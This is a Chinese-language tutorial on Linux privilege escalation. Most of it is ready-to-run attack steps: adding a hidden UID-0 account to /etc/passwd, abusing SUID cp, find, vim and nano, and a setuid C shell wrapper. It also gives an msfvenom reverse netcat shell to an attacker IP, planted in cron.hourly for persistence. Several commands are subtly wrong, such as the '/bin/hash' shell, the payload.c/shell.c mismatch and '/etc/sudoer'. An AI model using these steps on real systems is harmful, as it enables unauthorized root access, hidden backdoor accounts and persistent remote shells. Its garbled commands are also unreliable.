利用/etc/passwd提权
个人认为,这种提权方式在现实场景中难以实现,条件太过苛刻,但是建立Linux下的隐藏账户是个不错的选择,灵感来自:https://www.hackingarticles.in/editing-etc-passwd-file-for-privilege-escalation/
利用条件
- 拥有一个普通用户的权限
- 普通用户有
/etc/passwd
的写权限
利用原理
目前不是特别清楚,只知道Linux下的
/etc/passwd
用于标识账户信息,/etc/shadow
用于标识密码信息,/etc/group
用于标识用户组信息利用细节
直接修改
/etc/passwd
,先观察root用户的格式:root:x:0:0:root:/root:/bin/bash
root表示用户名;x表示密码hash,0表示用户ID,0表示用户组ID,/root表示用户相关信息,/bin/bash表示该用户使用何种shell执行命令
举个例子:
test:passwd_hash:0:0::/bin/hash
这里只要设置密码hash值即可,制作密码hash有以下几种方式:
OpenSSL
openssl passwd -1 -salt salt password
mkpasswd
mkpasswd -m SHA-512 password
Python
python -c 'import crypt; print crypt.crypt("password","$6$salt")'
Perl
perl -le 'print crypt("password","salt")'
PHP
php -r "print(crypt('password','salt') . \"\n\");"
利用suid提权
灵感来自:https://www.hackingarticles.in/linux-privilege-escalation-using-suid-binaries/
在Linux中,存在suid、guid、sticky,suid是一种权限类型,它允许拥有SUID的用户使用指定用户的权限执行文件,通常SUID表示文件的最高执行权限。一般Linux中文件的权限如0777,第一位0表示为特殊权限,7表示rwx(读写执行);对于第一位,如果是4表示拥有SUID权限,如果是2表示拥有GUID权限,如果是1表示,拥有sticky的权限,它能创建删除任何用户ID在目录中的文件
在实际复现时,发现确实还是挺实用的-.-,测试环境kali-2019.1
利用条件
- 文件拥有SUID权限
- 一个普通用户权限
利用原理
本质上是间接利用了
/etc/passwd
提权,一般采用find / -perm -u=s -type f 2>/dev/null
利用细节
利用cp命令提权
第一:查看
/bin/cp
是否具备SUID权限whereis find find / -perm -u=s -type f 2>/dev/null
第二:替换
/etc/passwd
先获取原本的
/etc/passwd
;然后在文件中添加一行用户信息,其中用户的hash制作可参考/etc/passwd
提权中的方式;最后将篡改后的passwd
文件覆盖/etc/passwd
文件第三:第二步其实已经完成,此处可再利用
cp
命令反弹shellmsfvenom -p cmd/unix/reverse_netcat lhost=攻击者IP lport=攻击者监听的端口 R # 生成并保存至1.sh文件中
# 将反弹shell的脚本放置在计划任务中,使其每小时启动一次 cp 1.sh /etc/cron.hourly/
利用find命令提权
第一:查看find命令所在的文件位置
whereis find find / -perm -u=s -type f 2>/dev/null
第二:使用find执行系统命令
# 先创建一个空文件 touch temp # 然后借助空文件执行系统命令 find temp -exec "whoami" \; # 这几个命令比较相似,区别无非就是:有没有引号,有没有花括号,实际测试时,这条指令一切OK find /etc/passwd -exec whoami \; # 其它命令 find /etc/passwd -exec whoami {} \;
第三:扩展
# 实际测试时,综合利用,发现还比较实用,因为find一般默认拥有SUID权限 # 在测试时发现执行命令有时跟当前一般用户权限有关,如:重定向操作符无法正常使用,因为没有写权限 # 这里采用一种迂回的方式,写文件 # 使用dd命令生成一个空文件 dd if=/dev/zero of=/var/www/html/1.txt bs=1 count=1 # 然后使用sed替换文件内容 sed -i 's/\x0/content/g' /var/www/html/1.txt # 使用这种方法,结合/etc/passwd提权方式,获取root权限
利用vim编辑器提权
第一:查看vim所在的文件位置
which vim whereis vim find / -perm -u=s -type f 2>/dev/null
第二:赋予普通用户sudo的权限
# 通过修改sudoer文件给与指定用户sudo的权限 visudo vim.basic /etc/sudoer # 在文件中写入一行数据 username ALL=(ALL:ALL) ALL
第三:验证用户是否拥有root权限
# 直接进入root的交互命令行 sudo bash # sudo查看shadow文件 sudo cat /etc/shadow
使用已保存的脚本提权
个人觉得这种方式没另外几种实用性好
#include<stdio.h> #include<unistd.h> #include<sys/types.h> int main() { setuid(geteuid()); system("/bin/bash"); return 0; }
上述代码保存至文件payload.c
使用以下命令生成一个拥有SUID的payload可执行文件
gcc shell.c -o shell chmod u+s shell
执行payload程序,获取root权限的交互shell
./payload id
通过Nano编辑器提权
第一:获取nano的文件位置
which nano whereis nano find / -perm -u=s -type f 2>/dev/null
第二:直接修改
/etc/passwd
# 编辑/etc/passwd nano /etc/passwd # 添加一行数据(参考/etc/passwd提权方式) test:password_hash:0:0::/root:/bin/bash
第三:其实第二步已经达成目标,第三步可选[个人感觉不是很方便]
# 编辑/etc/shadow nano /etc/shadow # 添加一行数据 按照格式填写用户相关的密码hash